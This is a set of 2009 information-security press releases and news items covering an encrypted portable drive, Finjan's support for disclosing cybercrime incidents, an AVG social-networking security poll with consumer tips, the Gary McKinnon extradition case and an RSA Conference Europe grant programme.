Tufin Technologies is the leading provider of Security Lifecycle Management solutions that enable large organizations to enhance security, ensure business continuity and increase operational efficiency. Tufin’s products SecureTrack, SecureChange™ Workflow, and the Tufin Security Suite™, help security operations teams to manage change, minimize risks and dramatically reduce manual, repetitive tasks through automation. Tufin’s open, extensible architecture enables any company with best of breed applications, devices and systems to take advantage of Tufin’s unmatched policy optimization, change management, and auditing capabilities. With a combination of accuracy and simplicity, Tufin empowers security officers to perform reliable audits and demonstrate compliance with corporate and government standards. Founded in 2005 by leading firewall and business systems experts, Tufin now serves more than 325 customers around the world, including leading financial institutions, telecom service providers, transportation, and energy and pharmaceutical companies. For more information visit www.tufin.com, or follow Tufin on:
Twitter at http://twitter.com/TufinTech,
LinkedIn at http://www.linkedin.com/groupRegistration?gid=1968264,
FaceBook at http://www.facebook.com/group.php?gid=84473097725,
The Tufin Blog at http://tufintech.wordpress.com/
The Tufin Channel on YouTube at http://www.youtube.com/user/Tufintech

<>

Hammer to Distribute Data Locker Encrypted Disk Drive

Unique portable disk drive utilizes LCD keypad and PIN system to ensure complete data security

Basingstoke, 24th August 2009 (Eskenzi PR): Dedicated storage distributor Hammer has announced it is to distribute Origin Storage’s acclaimed Data Locker portable disk drive under a pan-European agreement, in which Hammer is the exclusive VAD for the UK and Nordic markets.

The product uses an innovative PIN system, requiring the user to enter a 6- to 18-digit number on the unique LCD keypad in order to access the content, ensuring that the data contained is secure and can only be accessed by trusted sources.

The Data Locker uses a hardware-based encryption chip to seamlessly encrypt and decrypt data with military-grade AES (128- or 256-bit) encryption. Other state-of-the-art features include a random keypad, one-touch drive erase for rapid redeployment using the admin password, brute-force attack detection with a self-destruct response, and hardware-based malware detection and deflection.

Gerard Marlow, Disk Business Development Manager at Hammer, says: “This product is the ideal amalgamation of storage and security. It fits extremely well into Hammer’s portfolio, and resellers will find it will suit a wide range of their customers’ portable hard drive needs.”

Marlow continues: “In today’s society, security breaches and losses of data are unfortunately common occurrences. Data Locker’s unique security features, combined with impressive speeds and capacities, create the ideal environment for the transportation of sensitive data and files.”

Andy Cordial, Managing Director of Origin Storage, stated: “Hammer has an excellent record in supporting storage manufacturers in the UK and throughout Europe, and was our first choice of distributor for Data Locker. Due to the positioning of Data Locker as a high-end AES hardware encrypted portable storage device, and Hammer’s position as a high end supplier of storage solutions, it became obvious that Hammer was the number one choice.”

Cordial added: “I am confident that Hammer will add awareness and value to the Data Locker brand”.

Available in capacities of 160GB, 320GB, 500GB, 750GB and 1TB, and offered at two levels of security (Pro AES, for corporate and local government, and Enterprise, for military use and the transportation of mission-critical data), the Data Locker has the scope to accommodate all requirements.

Hammer is a leading specialist storage distributor. Its success is based on a total commitment to storage, combined with unrivalled technical knowledge and customer service quality in providing data storage for any storage requirement. Recognized for its commitment to innovation, Hammer works closely with selected world-class vendors and market-leading resellers and integrators. It also develops and provides flexible and bespoke storage solutions for all markets. Founded in 1991 and a privately owned company, Hammer has its headquarters in Basingstoke, England, with a staff of 100+, and has increasing European presence with offices in Ireland, the Nordics, Italy, and Benelux. For further information visit the website at www.hammerplc.com.

Origin Storage is a leading provider and manufacturer of disk-based data storage solutions, including the Data Locker range of touch LCD screen, PIN protected, hardware encrypted external USB bus powered storage solutions. The Data Locker Pro provides 128bit AES hardware encryption, and the Data Locker Enterprise provides 256bit AES hardware encryption with administrator privileges. Both products are available with 160-500GB capacity points and provide the most comprehensive hardware encryption features in the market today, providing a huge opportunity for VARs and system integrators to add a product range to meet the needs of data security conscious customers, at a time where high profile corporate and government data losses are a major cause for concern.

<>

Finjan Welcomes Initiatives for Public Disclosure of Cybercrime Incidents Information

San-Jose, Calif., August, 2009 (Eskenzi PR) – Finjan Inc., a leader in secure web gateway products and the provider of a unified web security solution for the enterprise market, responded today to the latest initiative for public disclosure of cybercrime incidents.

Corporate bank accounts are a popular target for cybercriminals. The soaring growth in cybercrime and attacks on businesses has dire implications. Dealing with the damage of a data breach is costly and time-consuming, and could even affect the survival of companies.

To face the current wave of cybercrime, Unspam Technologies has filed a lawsuit in Virginia under the CAN-SPAM Act to obtain forensic information about bank breaches that will help trace the perpetrators and bring them to justice.

“Finjan supports more public disclosure of data breaches. We believe such disclosure will help to minimize cybercrime and to keep institutions as well as their customers safe,” said Yuval Ben-Itzhak, CTO at Finjan.

“As explained in the lawsuit, one of the techniques for corporate bank account robbery involves the use of Trojan malware programs such as Zeus,” he continued. “The Zeus Trojan has been around for some time and remains popular. Our Malicious Code Research Center (MCRC) has detected and reported on various cases of data breaches using Zeus and similar malware. Cybercrime targeting businesses keeps on rising,” Ben-Itzhak concluded.

To keep abreast of the latest news on cybercrime trends, please visit: http://www.finjan.com/MCRCblog.aspx

To read more on the lawsuit: http://www.nytimes.com/2009/08/20/technology/20hacker.html

For more information about Finjan, please visit: www.finjan.com

<>

Social Networking Poll Shows Users More Vulnerable Than Ever

AVG and CMO Council survey shows that the widespread and growing use of social networks at home and work is creating serious danger of web-borne identity theft and infection

by Michael Smith (Veshengro)

The results of the “Bringing Social Security to the Online Community” poll were released in late August 2009. They highlight the vulnerabilities and concerns of social community members around cyber-security, and the precautions that they are taking, or need to take, to protect themselves.

The online survey conducted by AVG and the CMO Council reveals that while the social networking community has serious concerns about the overall security of public spaces, few are taking the most basic of steps to protect themselves against online crimes.

The survey shows that while the majority of social networking users are afflicted by web-borne security problems, less than one third are taking actions to protect themselves online.

The problem, and I do not think that this should come as a surprise to anyone, is how vulnerable people make themselves in those networks and forums. Anyone who uses those social networks and similar systems can see how openly people go about without the slightest consideration as to who could gain access to their personal information.

Participants indicated concern over growing phishing, spam and malware attacks, and nearly half of those surveyed are very concerned about their personal identity being stolen in an online community.

Many, however, do not use any proper measures to protect themselves despite the fact that both AVG and Finjan provide free browser tools that will check, for instance, the safety of links.

Often, when people encounter problems and, for instance, contact me, I am amazed (though I really should not be anymore) at how many of them have no AV and anti-malware programs on board, or none that are updated.

The survey was conducted online during the second quarter of 2009 and gathered responses from a random sampling of more than 250 consumers. According to the poll results, despite widespread use (86 percent) of social networks at home and/or at work, most fail to perform the following basic security measures on a regular basis:
Changing passwords (64 percent infrequently or never)
Adjusting privacy settings (57 percent infrequently or never)
Informing their social network administrator (90 percent infrequently or never)

“As social networking populations grow globally and the proliferation of niche social networks and mobile offerings extends the reach of social communities, the threats and vulnerabilities are escalating accordingly,” said Donovan Neale-May, executive director of the CMO Council. “More frequent breaches and outbreaks on popular social sites are a testament to the need for a more preventative mindset and threat-alert culture among community users.”

Despite the apparent security risks and dangers of engaging in social networking sites, respondents identified several common practices that could cause harm to unprotected users:
21 percent accept contact offerings from members they don’t recognize
More than half let acquaintances or roommates access social networks on their machines
64 percent click on links offered by community members or contacts
26 percent share files within social networks

As a result of this widespread proliferation of links, files, and unsolicited contacts, users have experienced high levels of breaches and threats:
Nearly 20 percent have experienced identity theft
47 percent have been victims of malware infections
55 percent have seen phishing attacks

“The fact that users understand the risks, and yet are failing to take the basic steps to protect themselves presents an interesting challenge to companies, like AVG, that are working to create a safer cyber community,” said Siobhan MacDermott, Head of Public Policy, Corporate Communications and Investor Relations, AVG Technologies.

According to MacDermott, AVG hopes to reverse this trend on familiar turfs such as Facebook and Twitter. “Our Data Snatchers campaign is a viral effort that will not only get consumers thinking about their personal security but will also provide them with simple tools to do something about it when they are in the spaces that make them feel the most vulnerable.”

MacDermott said that the Data Snatchers campaign is about combining sound technology with safe practices while enjoying the social computing experience.

In addition to encouraging users to take advantage of AVG’s free security offering at http://avgfree.com, MacDermott encourages users to follow Six Simple Steps to Stay Secure:
1. Do not accept pop-ups or prompts for software, unless you're armed with web scanner software such as AVG's free LinkScanner, which checks each site for infections prior to access.
2. Do not ever provide, post, or submit any confidential personal data (e.g., SSN, banking details, medical records). Social networking sites do not require this sort of information to join, unless you're online dating or paying monthly.
3. Change your password at least once a month. Do not change it if you're prompted to. This can be a third-party malicious link.
4. Do not let friends, peers, coworkers, etc. access their social networks on your computer, nor yours on their machine. Others could introduce infections to your computer through unsafe practices, or your login security could be compromised via cookies saved on your computer.
5. Never auto-save your password information, and clear your history at least once a week.
6. Do not accept friend requests or request friends that you personally do not know.

A full summary and presentation of the survey results and implications is available at avgnews.com.

Keep in touch with AVG
For up-to-the-minute news on the latest cyberthreats:
Subscribe to AVG Chief Research Officer Roger Thompson’s blog at http://thompson.blog.avg.com/

For general AVG updates
Join our Facebook community at www.facebook.com/avgfree
Follow AVG on Twitter @officialavgnews.com
Register at www.avgnews.com

To download AVG’s free LinkScanner product:
Visit http://linkscanner.avg.com/

The Chief Marketing Officer (CMO) Council is dedicated to high-level knowledge exchange, thought leadership and personal relationship building among senior corporate marketing leaders and brand decision-makers across a wide-range of global industries. The CMO Council's 4,500 members control more than $120 billion in aggregated annual marketing expenditures and run complex, distributed marketing and sales operations worldwide. In total, the CMO Council and its strategic interest communities include over 12,000 global executives across 90 countries in multiple industries, segments and markets. Regional chapters and advisory boards are active in the Americas, Europe, Asia Pacific, Middle East and Africa. The Council's strategic interest groups include the Coalition to Leverage and Optimize Sales Effectiveness (CLOSE), Brand Management Institute, and the Forum to Advance the Mobile Experience (FAME). www.cmocouncil.org

AVG is a global security software maker protecting more than 80 million consumers and small businesses in 167 countries from the ever-growing incidence of web threats, viruses, spam, cyber-scams and hackers on the Internet. AVG has nearly two decades of experience in combating cyber crime and one of the most advanced laboratories for detecting, pre-empting and combating Web-borne threats from around the world. Its free, downloadable software allows novice users to have basic anti-virus protection and then easily upgrade to greater levels of safety and defense when they are ready. AVG has nearly 6,000 resellers, partners and distributors globally including Amazon.com, CNET, Cisco, Ingram Micro, Play.com, Wal-Mart, and Yahoo!

While AVG, obviously, would want you to buy their pay-for products, AVG Free protects very well indeed and is a program that I do recommend to anyone who is willing to listen.

Combined with a few other programs such as PC Tools' “Threatfire” (please do not attempt to use in conjunction with ZoneAlarm) and with the use of proper caution at all times, problems should not occur.

© 2009
<>

Blogger asks CPS to 'take one for the team' in Gary McKinnon case

Infosecurity Adviser blogger asks CPS to 'take one for the team' in Gary McKinnon case

London UK, August 2009 (Infosecurity PR) - Neil Stinchcombe, a blogger for Infosecurity Adviser, has asked the Crown Prosecution Service (CPS) - which approved the US extradition request for self-confessed UFO hacker Gary McKinnon - to revisit the case following the failure of the latest, and final, stage of Gary's legal appeal process.

In a comment on the case on the Infosecurity Adviser Web site, Stinchcombe says that Gary is "just a pawn in a political and legal game between the UK and the US," adding that the original gameplan was for the CPS to revisit its original approval of the US government's extradition request.

"However, as Alan Johnson, the current Home Secretary, said when writing in the Sunday Times a few days after Gary's latest appeal through the courts: `It would be unlawful for the home secretary to intervene'."

Despite this, Stinchcombe says that the medical condition that Gary suffers from, coupled with the fact that the current US/UK extradition treaty is clearly biased against UK citizens, makes the US extradition request wholly unfair.

"As a result of these highly extenuating circumstances, I am now asking for the CPS to `take one for the team' and admit that its original approval on the extradition case was inappropriate," he said.

"Gary has become a pawn in a much bigger game," he explained, adding that if the CPS revisits its analysis of the case, then the UK government can quite honourably rescind the application and he can be tried as a UK citizen in a UK court.

Stinchcombe and his colleagues on the Infosecurity Adviser are so incensed by the UK government's insensitivity in the case that they are conducting a poll on the site - http://www.infosec.co.uk/gary - which asks visitors whether they think the CPS should declare its original assessment of the extradition request invalid.

"The reason for this is quite simple - we don't think that the CPS took all the relevant conditions into account when evaluating the US request," he said.

For more on Neil Stinchcombe's endgame analysis - and poll - on the Gary McKinnon case, see http://www.infosecurityadviser.com/view_message?id=136

Infosecurity Adviser is a unique community portal representing the information security industry and its users, organized in association with Infosecurity Europe. It offers advice from industry experts and bloggers as well as end user product reviews. It also contains information on qualifications, career paths and jobs from all the major accreditation bodies and is supported by the Information Security Awareness Forum. For more information see http://www.infosecurityadviser.com

<>

RSA® Conference Europe 2009 Launches Registration Grant Programme to Help IT Security Professionals Learn New Skills and Get Back to Work

Grant Aims to Provide Education and Networking Opportunities for Information Security Practitioners

London, UK, 1 September 2009 - RSA® Conference, the world’s leading information security conference group, today announced, in partnership with Acumin Consulting Ltd., the leading provider of Information Risk Management staff in Europe, the launch of its new Registration Grant Programme for security practitioners who have lost their jobs amid the economic downturn.

The RSA Conference Europe Registration Grant Programme will provide information security professionals the opportunity to attend RSA Conference Europe, where they can stay apprised of the latest security innovations, network with hundreds of peers and make valuable contacts.

This newly-launched Programme will award complimentary RSA Conference Europe 2009 delegate passes to five previous attendees of the Conference, as well as five delegate passes to information security professionals who are interested in continuing their education.

Criteria to be selected for the RSA Conference Europe Registration Grant Programme include:

  • Must be an information security professional (practitioner, security architect or similar role);
  • Must complete a 1,000-character explanation on “Why I want to attend RSA Conference Europe 2009”;
  • Must submit a 750-character biography to verify their role as a security practitioner;
  • Must be willing to participate in on-site promotional activities.

To apply for the RSA Conference Europe Registration Grant Programme, information security professionals can submit their applications online at http://www.rsaconference.com/2009/europe/index.htm, between Tuesday 1st September and Friday 11th September. Ten qualified entrants will be selected by RSA Conference Europe and Acumin Consulting Ltd., and notified by Tuesday 15th September if they have received a free Delegate pass to RSA Conference Europe 2009. Acumin Consulting Ltd. will also provide an on-site career counselling service to the ten successful submissions at the Conference.

“Many security professionals have lost their jobs as a result of the current economic environment,” said Linda Lynch, RSA Conference Europe Manager. “This new programme provides another way for RSA Conference to help industry practitioners enhance their skills and improve their career prospects.”

To obtain more information regarding RSA Conference Europe 2009, please visit the event website at http://www.rsaconference.com/2009/europe/index.htm

RSA Conference Europe and Acumin will select successful applicants based on the criteria outlined above in their sole discretion. The decision of RSA Conference Europe and Acumin is final and does not reflect the opinions of, or serve as an endorsement by, the sponsors or exhibitors of RSA Conference Europe, RSA, The Security Division of EMC or Acumin. RSA Conference management reserves the right to modify these qualifications and related rules at any time, without notice. The free Delegate pass given as part of the RSA Conference Europe Registration Grant Programme only covers the delegate registration fee for RSA Conference Europe 2009 in London from 20th-22nd October 2009 and does not cover hotel, travel, parking or any other incidental expenses.

RSA Conference helps drive the global information security agenda with annual events in the U.S., Europe and Japan. Throughout its 18-year history, RSA Conference consistently attracts the world’s best and brightest in the field, creating opportunities to learn about information security’s most important issues through face-to-face and online interactions with peers, luminaries and emerging and established companies. As information security professionals work to stay ahead of ever-changing security threats and trends, they turn to RSA Conference for a 360-degree view of the industry. RSA Conference seeks to arm participants with the knowledge they need to remain at the forefront of the information security business. More information on events, online programming and the most up-to-date news pertaining to the information security industry can be found at www.rsaconference.com.

Acumin is the leading provider of Information Risk Management staff in Europe. Established in 1998, our specialist team of consultants has unrivalled knowledge of the Information Security, Business Continuity, Storage and Data Protection markets. We supply both permanent and contract staff at all levels to industries spanning all sectors, from first-tier banks to global consultancies and software companies across EMEA.

Since its inception, Acumin has achieved its success through developing strong business relationships with leading Information Security companies, helping them to develop strong professional services and sales teams. In addition, Acumin have helped to develop internal Information Risk Management teams within end users across the UK and Europe.

Building on the success of the core offering of permanent and contract recruitment, Acumin has leveraged its knowledge of the risk management markets to introduce further offerings including retained search, team moves, networking events and European market entry consultancy to organisations within the UK and across Europe and the US.

For more information visit www.acumin.co.uk

<>